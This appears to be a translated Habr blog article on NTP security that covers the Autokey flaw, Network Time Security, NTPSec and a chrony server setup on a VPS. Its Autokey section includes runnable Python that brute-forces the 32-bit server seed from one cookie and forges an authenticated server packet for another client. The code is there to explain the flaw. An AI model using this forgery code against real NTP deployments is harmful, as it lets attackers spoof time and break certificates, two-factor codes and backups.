How do you make sure that time never lies when you have millions of large and small machines talking to each other over TCP/IP? After all, each of them has a clock, and the time has to be right on all of them. There is no way around this problem without NTP.
Let's imagine for a minute that some part of an industrial IT infrastructure has trouble keeping its services synchronized in time. Immediately the enterprise software cluster stack starts to fail, domains fall apart, and master and standby nodes try in vain to restore their state.
It is also possible that an attacker deliberately tries to tamper with the time through a MiTM or DDoS attack. In such a scenario anything can happen:
- user account passwords expire;
- X.509 certificates expire;
- TOTP two-factor authentication stops working;
- backups become obsolete and the system deletes them;
- DNSSEC breaks.
Obviously every IT department has an interest in time synchronization services that work reliably, and it would be good if they were both reliable and secure in industrial use.
Cracking NTP in 25 minutes
Network protocols are like millennials with one peculiarity: they have been around for a long time and nobody likes them anymore, but replacing them is not easy even when a crowd of enthusiasts and money have been gathered.
The main complaint about classic NTP is the lack of reliable mechanisms for protecting it against attackers. Various attempts have been made to fix this. The first was the pre-shared key (PSK) method of exchanging symmetric keys.
Unfortunately that method did not pay off, for a simple reason: it does not scale. Manual configuration is required on the client side for every server. This means you cannot simply add another client. And if something changes on the NTP server, every client has to be reconfigured.
Then came Autokey, but a number of flaws were found in the design of the algorithm itself and it had to be abandoned. The problem is that the seed is only 32 bits, which is far too small and does not provide enough computational complexity against a brute-force attack.
Autokey operates with the following values:
- Key ID: the 32-bit identifier of the symmetric session key;
- MAC (message authentication code): the NTP packet checksum;
- Autokey: the session key itself, which is computed as follows.
Autokey = H(Sender-IP || Receiver-IP || KeyID || Cookie)
where H() is a cryptographic hash function. The same function is used to compute the packet checksum.
MAC = H(Autokey || NTP packet)
It turns out that the entire integrity check of the packet rests on the secrecy of the cookie. Once you have it, you can derive the autokey and then forge the MAC. The NTP server, however, mixes a seed into the cookie when it generates it. That is where the catch is.
Cookie = MSB_32(H(Client IP || Server IP || 0 || Server Seed))
The MSB_32 function keeps the 32 most significant bits of the MD5 hash. The client's cookie does not change as long as the server's seed stays the same. So the attacker only has to recover the seed to be able to generate cookies on their own.
First you connect to the NTP server as an ordinary client and receive a cookie. Then the attacker recovers the seed by brute force, following this simple algorithm.
Algorithm for recovering the seed by brute force (the argument order must match the server's cookie computation above):
for i = 0 : 2^32 - 1 do
    Ci = H(Client-IP || Server-IP || 0 || i)
    if Ci = Cookie then
        return i
    end if
end for
The IP addresses are known, so all that is left is to compute up to 2^32 hashes until the generated cookie matches the one received from the NTP server. On an ordinary workstation with an Intel Core i5 this takes about 25 minutes.
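The recovery loop above, as an added Python example that is not part of the original article. It assumes a byte layout for the hashed fields (each IP address, key ID, seed and cookie as a 32-bit big-endian word, concatenated in the order of the formulas above) and uses a deliberately tiny seed so that the search finishes in a fraction of a second; against a real 32-bit seed the same loop is what takes the 25 minutes mentioned above. The IP addresses, the seed, the key ID and the packet bytes are constructed. The second half shows why the seed matters: with it, the attacker computes a third client's cookie and produces the same MAC the genuine server would attach to a forged server packet.

```python
import hashlib
import ipaddress
import struct
from typing import Optional

# Added example, not code from the article. Layout assumption: every hashed
# field is one 32-bit big-endian word, concatenated in the order of the
# formulas in the text: Cookie = MSB_32(MD5(Client IP || Server IP || 0 || Seed)).


def ip_word(ip: str) -> bytes:
    """An IPv4 address as the 32-bit word that goes into the hash."""
    return int(ipaddress.IPv4Address(ip)).to_bytes(4, "big")


def msb32(digest: bytes) -> int:
    """MSB_32: the 32 most significant bits of the digest as an integer."""
    return int.from_bytes(digest[:4], "big")


def server_cookie(client_ip: str, server_ip: str, seed: int) -> int:
    """Cookie = MSB_32(MD5(Client IP || Server IP || 0 || Server Seed))."""
    data = ip_word(client_ip) + ip_word(server_ip) + struct.pack(">II", 0, seed)
    return msb32(hashlib.md5(data).digest())


def autokey(sender_ip: str, receiver_ip: str, key_id: int, cookie: int) -> bytes:
    """Autokey = H(Sender-IP || Receiver-IP || KeyID || Cookie)."""
    data = ip_word(sender_ip) + ip_word(receiver_ip) + struct.pack(">II", key_id, cookie)
    return hashlib.md5(data).digest()


def packet_mac(key: bytes, ntp_packet: bytes) -> bytes:
    """MAC = H(Autokey || NTP packet)."""
    return hashlib.md5(key + ntp_packet).digest()


def recover_seed(client_ip: str, server_ip: str, cookie: int,
                 max_seed: int = 2 ** 32) -> Optional[int]:
    """The brute-force loop from the text: try every seed until the cookie matches.

    max_seed only bounds the search so that the demo finishes quickly; a real
    attack walks all 2**32 candidates (about 25 minutes on a desktop CPU).
    """
    prefix = ip_word(client_ip) + ip_word(server_ip) + b"\x00\x00\x00\x00"
    for candidate in range(max_seed):
        digest = hashlib.md5(prefix + struct.pack(">I", candidate)).digest()
        if msb32(digest) == cookie:
            return candidate
    return None


# Constructed demo values. The seed is artificially small on purpose.
SERVER_IP = "192.0.2.1"
ATTACKER_IP = "192.0.2.10"
VICTIM_IP = "192.0.2.20"
SECRET_SEED = 0xBEEF


def forge_demo() -> dict:
    """Recover the seed from the attacker's own cookie, then forge a server
    packet for a third client and check that it carries the MAC the genuine
    server would have produced."""
    # Step 1: the attacker joins as an ordinary client and receives its cookie.
    own_cookie = server_cookie(ATTACKER_IP, SERVER_IP, SECRET_SEED)
    # Step 2: brute-force the seed from that cookie.
    seed = recover_seed(ATTACKER_IP, SERVER_IP, own_cookie, max_seed=1 << 20)
    if seed is None:
        return {"recovered_seed": None, "forgery_accepted": False}
    # Step 3: with the seed, compute the victim's cookie, the server->victim
    # autokey and the MAC for a forged server-mode NTP packet.
    forged_packet = bytes([0x24]) + bytes(47)   # LI=0, VN=4, mode 4 (server), rest zeroed
    key_id = 0x12345678                          # constructed key ID
    victim_cookie = server_cookie(VICTIM_IP, SERVER_IP, seed)
    forged_mac = packet_mac(autokey(SERVER_IP, VICTIM_IP, key_id, victim_cookie), forged_packet)
    # What the genuine server, holding the real seed, would attach to the same packet:
    genuine_cookie = server_cookie(VICTIM_IP, SERVER_IP, SECRET_SEED)
    genuine_mac = packet_mac(autokey(SERVER_IP, VICTIM_IP, key_id, genuine_cookie), forged_packet)
    return {"recovered_seed": seed, "forgery_accepted": forged_mac == genuine_mac}


if __name__ == "__main__":
    print(forge_demo())
```

The point to take from the demo is that nothing in the scheme ties the cookie to anything the attacker cannot obtain: the addresses are public, the key ID is chosen by the sender, and the only secret is a 32-bit value that a single legitimate cookie lets you search for offline.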
NTS, the new Autokey
Such security holes in Autokey could not be tolerated, and in 2012 a new protocol appeared. To avoid confusion over the name it was rebranded, so Autokey v2 became Network Time Security.
The NTS protocol is a security extension for NTP and currently supports unicast mode. It provides strong cryptographic protection against packet tampering, prevents snooping, scales well, is resilient to packet loss on the network, and costs very little accuracy during secure synchronization.
An NTS connection has two phases, each using a lower-layer protocol. In the first phase the client and server agree on the connection parameters and exchange cookies carrying the keys together with all the accompanying data. In the second phase the actual NTS-protected synchronization takes place between the client and the NTP server.

NTS has two lower-layer protocols: Network Time Security Key Exchange (NTS-KE), which sets up a secure connection over TLS, and NTPv4, the current version of the NTP protocol. A little more on each below.
Phase one: NTS-KE
In this phase the NTP client opens a TLS 1.2/1.3 session over a separate TCP connection to the NTS-KE server (the final specification, RFC 8915, requires TLS 1.3). During this procedure the following happens.
- The parties choose the algorithm parameters for the second phase.
- The parties agree on the second lower-layer protocol, although at the moment only NTPv4 is supported.
- The parties agree on the IP address and port of the NTP server.
- The NTS-KE server issues cookies for NTPv4.
- The parties derive two symmetric keys (C2S and S2C) from the TLS key material.
The big advantage of this approach is that the whole burden of transmitting the secret connection parameters falls on the proven and reliable TLS protocol. This removes the need to reinvent the wheel for a secure NTP handshake.
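The first-phase exchange, as an added Python example that is not code from the article or from any NTS implementation. It encodes and decodes the NTS-KE records that travel inside the TLS session (type word with critical bit, length, body), builds the client's request, lets a server pick an AEAD and issue cookies, and has the client reject error records, unrecognized critical records and responses that do not contain NTPv4, an offered AEAD and at least one cookie. Record types, the AEAD identifier and the error codes are the RFC 8915 values; the cookie bodies are constructed (a real server seals the AEAD ID and both keys under its own master key), and the TLS session itself is not modelled, only the exporter context that derives C2S and S2C from it.

```python
import struct
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Set, Tuple

# Added example, not code from the article. Record types, AEAD ID and error
# codes follow RFC 8915; the server's cookie contents are a constructed stand-in.
END_OF_MESSAGE, NEXT_PROTOCOL, ERROR, WARNING = 0, 1, 2, 3
AEAD_ALGORITHM, NEW_COOKIE, SERVER_NEGOTIATION, PORT_NEGOTIATION = 4, 5, 6, 7
CRITICAL = 0x8000                 # high bit of the record type word
PROTO_NTPV4 = 0                   # the only next protocol defined so far
AEAD_AES_SIV_CMAC_256 = 15        # the AEAD every NTS server must support
ERR_UNRECOGNIZED_CRITICAL, ERR_BAD_REQUEST = 0, 1

Record = Tuple[int, bool, bytes]  # (type, critical flag, body)


def encode_record(rtype: int, body: bytes = b"", critical: bool = False) -> bytes:
    """Type (with critical bit), body length, body."""
    return struct.pack(">HH", rtype | (CRITICAL if critical else 0), len(body)) + body


def decode_records(data: bytes) -> List[Record]:
    records, off = [], 0
    while off + 4 <= len(data):
        word, length = struct.unpack_from(">HH", data, off)
        body = data[off + 4:off + 4 + length]
        if len(body) != length:
            raise ValueError("truncated record")
        off += 4 + length
        records.append((word & 0x7FFF, bool(word & CRITICAL), body))
        if word & 0x7FFF == END_OF_MESSAGE:
            return records
    raise ValueError("missing End of Message record")


def u16s(body: bytes) -> List[int]:
    return list(struct.unpack(">%dH" % (len(body) // 2), body))


def error_response(code: int) -> bytes:
    return encode_record(ERROR, struct.pack(">H", code), True) + encode_record(END_OF_MESSAGE, critical=True)


def build_client_request(aead_prefs: List[int]) -> bytes:
    """Client -> server (inside TLS): the protocol and the AEADs in order of preference."""
    return (encode_record(NEXT_PROTOCOL, struct.pack(">H", PROTO_NTPV4), True)
            + encode_record(AEAD_ALGORITHM, struct.pack(">%dH" % len(aead_prefs), *aead_prefs), True)
            + encode_record(END_OF_MESSAGE, critical=True))


def server_response(request: bytes, supported: Set[int],
                    mint_cookie: Callable[[int], bytes], cookies: int = 8) -> bytes:
    """Server -> client: pick the first client-preferred AEAD we support and
    issue cookies. mint_cookie(aead_id) stands in for the server sealing
    (AEAD ID, C2S, S2C) under its master key; the body is opaque to the client."""
    protocols, aeads = [], []
    for rtype, critical, body in decode_records(request):
        if rtype == NEXT_PROTOCOL:
            protocols = u16s(body)
        elif rtype == AEAD_ALGORITHM:
            aeads = u16s(body)
        elif rtype != END_OF_MESSAGE and critical:
            return error_response(ERR_UNRECOGNIZED_CRITICAL)
    chosen = next((a for a in aeads if a in supported), None)
    if PROTO_NTPV4 not in protocols or chosen is None:
        return error_response(ERR_BAD_REQUEST)
    out = encode_record(NEXT_PROTOCOL, struct.pack(">H", PROTO_NTPV4), True)
    out += encode_record(AEAD_ALGORITHM, struct.pack(">H", chosen), True)
    out += b"".join(encode_record(NEW_COOKIE, mint_cookie(chosen)) for _ in range(cookies))
    return out + encode_record(END_OF_MESSAGE, critical=True)


@dataclass
class KeResult:
    aead: int
    cookies: List[bytes] = field(default_factory=list)
    server: Optional[str] = None  # NTPv4 Server Negotiation; the NTS-KE host if absent
    port: int = 123               # NTPv4 Port Negotiation; the default NTP port if absent


def parse_server_response(response: bytes, aead_prefs: List[int]) -> KeResult:
    """Client side: fail on error records and unknown critical records, and
    require NTPv4, an AEAD we offered, and at least one cookie."""
    result, protocols = KeResult(aead=-1), []
    for rtype, critical, body in decode_records(response):
        if rtype == ERROR:
            raise ValueError("NTS-KE error %d" % u16s(body)[0])
        elif rtype == NEXT_PROTOCOL:
            protocols = u16s(body)
        elif rtype == AEAD_ALGORITHM:
            result.aead = u16s(body)[0]
        elif rtype == NEW_COOKIE:
            result.cookies.append(body)
        elif rtype == SERVER_NEGOTIATION:
            result.server = body.decode("ascii")
        elif rtype == PORT_NEGOTIATION:
            result.port = u16s(body)[0]
        elif rtype not in (WARNING, END_OF_MESSAGE) and critical:
            raise ValueError("unrecognized critical record %d" % rtype)
    if protocols != [PROTO_NTPV4] or result.aead not in aead_prefs or not result.cookies:
        raise ValueError("negotiation failed")
    return result


def export_context(aead_id: int, direction: str) -> bytes:
    """Context for the TLS exporter (label EXPORTER-network-time-security) that
    derives C2S ("c2s") or S2C ("s2c") from the TLS session after this exchange."""
    return struct.pack(">HHB", PROTO_NTPV4, aead_id, 0 if direction == "c2s" else 1)
```

Two details matter for security here. The client, not the server, decides which records are acceptable: anything critical that it does not understand aborts the exchange, and an AEAD it never offered is rejected even if the server claims it. And the keys are never sent at all; both sides derive them from the TLS session with the exporter context above, so nothing in these records is worth stealing except the cookies, which are useless without the keys.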
Phase two: NTP under NTS protection
In the second phase the client synchronizes time with the NTP server securely. For this it sends four special extension fields in the NTPv4 packet.
- The Unique Identifier Extension carries a unique nonce to protect against replay attacks.
- The NTS Cookie Extension carries one of the NTP cookies the client has. Since only the client holds the C2S and S2C symmetric AEAD keys, the NTP server has to extract them from the cookie.
- The NTS Cookie Placeholder Extension is the way the client asks the server for additional cookies. The extension must be sized so that the NTP server's response is no longer than the request; this helps prevent amplification attacks.
- The NTS Authenticator and Encrypted Extension Fields Extension carries the AEAD output under the C2S key, with the NTP header, the timestamps and the extension fields above as associated data. Without this extension the timestamps could be tampered with.

On receiving a request from the client, the server verifies the authenticity of the NTP packet. To do this it has to decrypt the cookie and extract the AEAD algorithm and the keys from it. After the NTP packet has been authenticated successfully, the server replies to the client as follows.
- The Unique Identifier Extension is a mirror copy of the one in the client's request, a measure against replay attacks.
- The NTS Cookie Extension carries new cookies so that the session can continue.
- The NTS Authenticator and Encrypted Extension Fields Extension carries the AEAD output under the S2C key.
The second exchange can be repeated many times without going back to the first phase, because every request and response gives the client more cookies. The advantage is that the computational cost of TLS and of transferring PKI data is amortized over the number of repeated requests. This is especially suited to FPGA-based time servers, where all the heavy operations can be reduced to a few symmetric-cryptography functions and the whole TLS stack offloaded to another device.
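The second-phase packets, as an added Python example that is not code from the article or from any NTS implementation. It frames the four extension fields described above, has the server check that every placeholder is the size of the cookie and that its reply cannot be longer than the request (the amplification guard), echoes the Unique Identifier, and has the client refuse a reply whose identifier does not match what it sent (the replay guard). The AEAD is a constructed stand-in (encrypt-then-MAC over SHA-256 and HMAC), since the standard library has no AEAD_AES_SIV_CMAC_256; the keys, cookies and packet contents are constructed, and the `cookie_keys` callback stands in for the server decrypting the cookie with its master key.

```python
import hashlib
import hmac
import os
import struct
from typing import Callable, List, Tuple

# Added example, not code from the article. NTS extension field types per
# RFC 8915; the NTPv4 header is a fixed 48 bytes.
UNIQUE_ID, COOKIE, PLACEHOLDER, AUTH_ENC = 0x0104, 0x0204, 0x0304, 0x0404
HDR = 48


def pad4(b: bytes) -> bytes:
    return b + bytes(-len(b) % 4)


def ef(ftype: int, value: bytes) -> bytes:
    """RFC 7822 framing: type, total length including this 4-byte header, value padded to 4."""
    body = pad4(value)
    return struct.pack(">HH", ftype, 4 + len(body)) + body


def parse_efs(pkt: bytes) -> List[Tuple[int, int, bytes]]:
    """(offset, type, value) for each extension field after the header; rejects bad lengths."""
    out, off = [], HDR
    while off < len(pkt):
        if off + 4 > len(pkt):
            raise ValueError("truncated extension field")
        ftype, length = struct.unpack_from(">HH", pkt, off)
        if length < 4 or length % 4 or off + length > len(pkt):
            raise ValueError("malformed extension field")
        out.append((off, ftype, pkt[off + 4:off + length]))
        off += length
    return out


# Stand-in AEAD (encrypt-then-MAC with SHA-256/HMAC). NTS negotiates
# AEAD_AES_SIV_CMAC_256, which the standard library lacks; this keeps the
# example self-contained and is for illustration only.
def _stream(key: bytes, nonce: bytes, n: int) -> bytes:
    ek = hashlib.sha256(key + b"enc").digest()
    return b"".join(hashlib.sha256(ek + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(n // 32 + 1))[:n]


def _tag(key: bytes, nonce: bytes, assoc: bytes, ct: bytes) -> bytes:
    mk = hashlib.sha256(key + b"mac").digest()
    return hmac.new(mk, nonce + assoc + ct, hashlib.sha256).digest()[:16]


def seal(key: bytes, nonce: bytes, assoc: bytes, plaintext: bytes) -> bytes:
    ct = bytes(p ^ s for p, s in zip(plaintext, _stream(key, nonce, len(plaintext))))
    return ct + _tag(key, nonce, assoc, ct)


def unseal(key: bytes, nonce: bytes, assoc: bytes, sealed: bytes) -> bytes:
    ct, tag = sealed[:-16], sealed[-16:]
    if not hmac.compare_digest(tag, _tag(key, nonce, assoc, ct)):
        raise ValueError("authentication failed")
    return bytes(c ^ s for c, s in zip(ct, _stream(key, nonce, len(ct))))


def auth_ef(key: bytes, assoc: bytes, plaintext: bytes = b"") -> bytes:
    """NTS Authenticator and Encrypted EFs: nonce length, ciphertext length, nonce,
    ciphertext. assoc is everything before this field (header plus earlier EFs)."""
    nonce = os.urandom(16)
    ct = seal(key, nonce, assoc, plaintext)
    return ef(AUTH_ENC, struct.pack(">HH", len(nonce), len(ct)) + pad4(nonce) + pad4(ct))


def split_auth(value: bytes) -> Tuple[bytes, bytes]:
    nlen, clen = struct.unpack_from(">HH", value)
    ct_off = 4 + len(pad4(value[4:4 + nlen]))
    return value[4:4 + nlen], value[ct_off:ct_off + clen]


def build_request(c2s: bytes, cookie: bytes, placeholders: int = 0) -> bytes:
    pkt = bytes([0x23]) + bytes(HDR - 1)                        # LI=0, VN=4, mode 3 (client)
    pkt += ef(UNIQUE_ID, os.urandom(32)) + ef(COOKIE, cookie)
    pkt += ef(PLACEHOLDER, bytes(len(cookie))) * placeholders   # each the size of the cookie
    return pkt + auth_ef(c2s, pkt)


def server_handle(pkt: bytes, cookie_keys: Callable[[bytes], Tuple[bytes, bytes]],
                  mint_cookie: Callable[[], bytes]) -> bytes:
    """cookie_keys(cookie) stands in for decrypting the cookie with the server's
    master key to recover (C2S, S2C); mint_cookie() issues a fresh opaque cookie."""
    efs = parse_efs(pkt)
    if not efs:
        raise ValueError("no extension fields")
    auth_off, auth_type, auth = efs[-1]
    uids = [v for _, t, v in efs if t == UNIQUE_ID]
    cookies = [v for _, t, v in efs if t == COOKIE]
    holders = [v for _, t, v in efs if t == PLACEHOLDER]
    if auth_type != AUTH_ENC or len(uids) != 1 or len(uids[0]) < 32 or len(cookies) != 1:
        raise ValueError("bad request")
    if any(len(h) != len(cookies[0]) for h in holders):
        raise ValueError("placeholder size mismatch")          # amplification guard
    c2s, s2c = cookie_keys(cookies[0])
    nonce, ct = split_auth(auth)
    unseal(c2s, nonce, pkt[:auth_off], ct)                     # fails if anything before it changed
    new_cookies = b"".join(ef(COOKIE, mint_cookie()) for _ in range(len(holders) + 1))
    resp = bytes([0x24]) + bytes(HDR - 1) + ef(UNIQUE_ID, uids[0])   # mode 4, identifier echoed
    resp += auth_ef(s2c, resp, new_cookies)                    # new cookies travel encrypted
    if len(resp) > len(pkt):
        raise ValueError("response would exceed request size")
    return resp


def client_handle(resp: bytes, sent_uid: bytes, s2c: bytes) -> List[bytes]:
    efs = parse_efs(resp)
    auth_off, auth_type, auth = efs[-1]
    if auth_type != AUTH_ENC or [v for _, t, v in efs if t == UNIQUE_ID] != [sent_uid]:
        raise ValueError("unique identifier mismatch: replayed or foreign response")
    nonce, ct = split_auth(auth)
    inner = unseal(s2c, nonce, resp[:auth_off], ct)
    return [v for _, t, v in parse_efs(bytes(HDR) + inner) if t == COOKIE]


def demo() -> dict:
    """One protected exchange with three placeholders, then a tampered request."""
    c2s, s2c = hashlib.sha256(b"c2s").digest(), hashlib.sha256(b"s2c").digest()  # constructed keys
    cookie = b"\xaa" * 32                                                           # constructed cookie
    req = build_request(c2s, cookie, placeholders=3)
    resp = server_handle(req, lambda ck: (c2s, s2c), lambda: os.urandom(32))
    sent_uid = next(v for _, t, v in parse_efs(req) if t == UNIQUE_ID)
    got = client_handle(resp, sent_uid, s2c)
    tampered = bytearray(req)
    tampered[40] ^= 0x01                                       # flip a bit in the transmit timestamp
    try:
        server_handle(bytes(tampered), lambda ck: (c2s, s2c), lambda: os.urandom(32))
        rejected = False
    except ValueError:
        rejected = True
    return {"cookies": len(got), "request_len": len(req),
            "response_len": len(resp), "tamper_rejected": rejected}
```

Two things are visible in the byte counts that the prose only states: with three placeholders the client gets four cookies back and the reply is exactly as long as the request, because the placeholders were pre-paid for in request bytes; and the timestamps are covered as associated data, so a single flipped bit anywhere before the authenticator makes the server drop the packet.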
NTPSec
What is special about NTP? Although the project's author, Dave Mills, tried to write his code as carefully as he could, only a rare specialist could make sense of the intricacies of time synchronization algorithms that are 35 years old. Part of the code was written before POSIX existed, when the Unix API was very different from what is used today. On top of that, numerical expertise is needed to extract the signal from the errors on noisy channels.
NTS was not the first attempt to fix NTP. Once attackers learned to use NTP's misbehaviour to amplify DDoS attacks, it became clear that major changes were needed. And while the NTS specification was being drafted and finalized, at the end of 2014 the US National Science Foundation hastily allocated a grant for improving NTP.
The working group was headed by none other than Eric Raymond, one of the founders and pillars of the Open Source community and author of a well-known book. The first thing Eric and his colleagues tried to do was migrate the NTP code from the BitKeeper platform to git, but it did not work out that way. Project leader Harlan Stenn opposed the decision and the negotiations stalled. It was then decided to fork the project's code, and NTPSec was born.
Broad experience, including work on GPSD, mathematics and the black art of reading old code: Eric Raymond was exactly the cook who could pull off such a project. The team found a code-migration specialist, and in just ten weeks NTP was on GitLab. The work was under way.
Eric Raymond's team approached the task the way Auguste Rodin approached a block of marble. By removing 175 KLOC of old code they were able to reduce the attack surface considerably and close a lot of security holes.
Here is an incomplete list of what went under the knife:
- Undocumented, obsolete, legacy or broken refclocks.
- The unused ICS library.
- libopts/autogen.
- Legacy Windows code.
- ntpdc.
- Autokey.
- The ntpq C code, rewritten in Python.
- The sntp/ntpdig C code, rewritten in Python.
Besides cleaning up the code, the project had other goals. Here is a list of what was achieved:
- Protection of the code against buffer overflows was improved substantially. To avoid buffer overruns, all the unsafe string functions (strcpy/strcat/strtok/sprintf/vsprintf/gets) were replaced with safe versions that take a buffer size limit.
- NTS support was added.
- Time-stepping precision was improved tenfold by integrating hardware features. This is because the clocks in modern computers are far more accurate than those of the era when NTP was born. GPSDOs and dedicated radio clocks benefited most from this.
- The number of programming languages was cut to two. Instead of Perl, awk and even S scripts, it is now all Python. This opens many more opportunities for code reuse.
- Instead of the noodle of autotools scripts, the project moved to a different build system.
- The project documentation was rewritten and reorganized. A contradictory and sometimes confused collection of old documents became usable documentation. Every command-line switch and every configuration entity now has a single authoritative description. Moreover, the man pages and the web documentation are now generated from the same central files.
NTPSec is available for a number of Linux distributions. At the moment the latest stable version is 1.1.8; Gentoo Linux carries the previous one.
(1:696)$ sudo emerge -av ntpsec
These are the packages that would be merged, in order:
Calculating dependencies... done!
[ebuild R ] net-misc/ntpsec-1.1.7-r1::gentoo USE="samba seccomp -debug -doc -early -gdb -heat -libbsd -nist -ntpviz -rclock_arbiter -rclock_generic -rclock_gpsd -rclock_hpgps -rclock_jjy -rclock_local -rclock_modem -rclock_neoclock -rclock_nmea -rclock_oncore -rclock_pps -rclock_shm -rclock_spectracom -rclock_trimble -rclock_truetime -rclock_zyfer -smear -tests" PYTHON_TARGETS="python3_6" 0 KiB
Total: 1 package (1 reinstall), Size of downloads: 0 KiB
Would you like to merge these packages? [Yes/No]
Chrony
There was another attempt to replace the old NTP with something more secure. Chrony, unlike NTPSec, was written from scratch and designed to work reliably under a wide range of conditions, including intermittent network connectivity, partial network availability or congestion, and temperature changes. In addition, chrony has several other advantages:
- chrony can synchronize the system clock faster and with greater accuracy;
- chrony is small, uses little memory and touches the CPU only when necessary, which is a big advantage in resource and power savings;
- chrony supports hardware timestamping on Linux, allowing very precise synchronization on local networks.
However, chrony lacks some features of classic NTP, such as broadcast and multicast client/server modes. Also, classic NTP supports a larger number of operating systems and platforms.
To disable the server functionality and NTP requests to the chronyd process, it is enough to write port 0 in chrony.conf. This is done when there is no need to serve time to NTP clients or peers. Since version 2.0 the NTP server port is opened only if access is allowed with the allow directive or the corresponding command, or an NTP peer is configured, or the broadcast directive is used.
The program has two modules.
- chronyd is a daemon running in the background. It collects information about the difference between the system clock and external time servers and adjusts the local time. It also implements the NTP protocol and can act as a client or a server.
- chronyc is a command-line utility for monitoring and controlling the program. It is used to fine-tune various service parameters; for example, it lets you add or remove NTP servers while chronyd is running.
Since version 7 of Red Hat Enterprise Linux chrony has been the time synchronization service. The package is also available for other Linux distributions. The latest stable version is 3.5, with v4.0 being prepared for release.
(1:712)$ sudo emerge -av chrony
These are the packages that would be merged, in order:
Calculating dependencies... done!
[binary N ] net-misc/chrony-3.5-r2::gentoo USE="adns caps cmdmon ipv6 ntp phc readline refclock rtc seccomp (-html) -libedit -pps (-selinux)" 246 KiB
Total: 1 package (1 new, 1 binary), Size of downloads: 246 KiB
Would you like to merge these packages? [Yes/No]
How do you set up your own remote chrony server on the Internet to synchronize time on an office network? Below is an example of doing it on a VPS.
Example of setting up Chrony on RHEL / CentOS on a VPS
Let's go a little further and set up our own NTP server on a VPS. It is very simple: pick a suitable plan on the RuVDS website, take a ready-made server and type a dozen simple commands. For our purposes this option is quite suitable.

Let's proceed with setting up the service, starting with installing the chrony package.
[root@server ~]$ yum install chrony
RHEL 8 / CentOS 8 use a different package manager.
[root@server ~]$ dnf install chrony
After installing chrony you need to enable and start the service (the unit is called chronyd, as in the later commands).
[root@server ~]$ systemctl enable chronyd --now
If you wish, you can edit /etc/chrony.conf and replace the NTP servers with ones closer to you to reduce response time.
# Use public servers from the pool.ntp.org project.
# Please consider joining the pool (http://www.pool.ntp.org/join.html).
server 0.ru.pool.ntp.org iburst
server 1.ru.pool.ntp.org iburst
server 2.ru.pool.ntp.org iburst
server 3.ru.pool.ntp.org iburst
Next, we start the NTP server synchronizing with nodes from the specified pool.
[root@server ~]$ timedatectl set-ntp true
[root@server ~]$ systemctl restart chronyd.service
You also need to open the NTP port to the outside, otherwise the firewall will block incoming connections from the client nodes. Opening the firewall is not sufficient on its own: as noted in the chrony section above, chronyd only opens its NTP port and answers clients once an allow directive for the client addresses is present in /etc/chrony.conf.
[root@server ~]$ firewall-cmd --add-service=ntp --permanent
[root@server ~]$ firewall-cmd --reload
On the client side it is enough to set the time zone correctly.
[root@client ~]$ timedatectl set-timezone Europe/Moscow
In the /etc/chrony.conf file, specify the IP address or hostname of our VPS, which chrony will use as its NTP server.
server my.vps.server
And finally, start time synchronization on the client.
[root@client ~]$ systemctl enable --now chronyd
[root@client ~]$ timedatectl set-ntp true
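Putting the server and client steps together, here is an added pair of configuration files for the scenario above; they are not from the article, and the office network 203.0.113.0/24 and the host name my.vps.server are placeholders to replace with the public address range of your office as the VPS sees it.

```text
# /etc/chrony.conf on the VPS (server side)
server 0.ru.pool.ntp.org iburst
server 1.ru.pool.ntp.org iburst
server 2.ru.pool.ntp.org iburst
server 3.ru.pool.ntp.org iburst
driftfile /var/lib/chrony/drift
makestep 1.0 3
rtcsync
# Serve time only to the office network. Without an allow directive
# chronyd (2.0 and later) does not open UDP 123 at all, so the
# firewall-cmd rule by itself is not enough.
allow 203.0.113.0/24

# /etc/chrony.conf on an office client
server my.vps.server iburst
driftfile /var/lib/chrony/drift
makestep 1.0 3
# Client only: never answer NTP requests from anyone
port 0
```

Restart chronyd after editing either file, then check `chronyc sources -v` and `chronyc tracking` on the client and `chronyc clients` on the server. A client that lists the VPS with a `?` in the sources output is not reaching a responding server; with the firewall already open, a missing or wrong allow range on the VPS is the first thing to check.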
Next time I will tell you which options exist for time synchronization without the Internet.
Source: www.habr.com
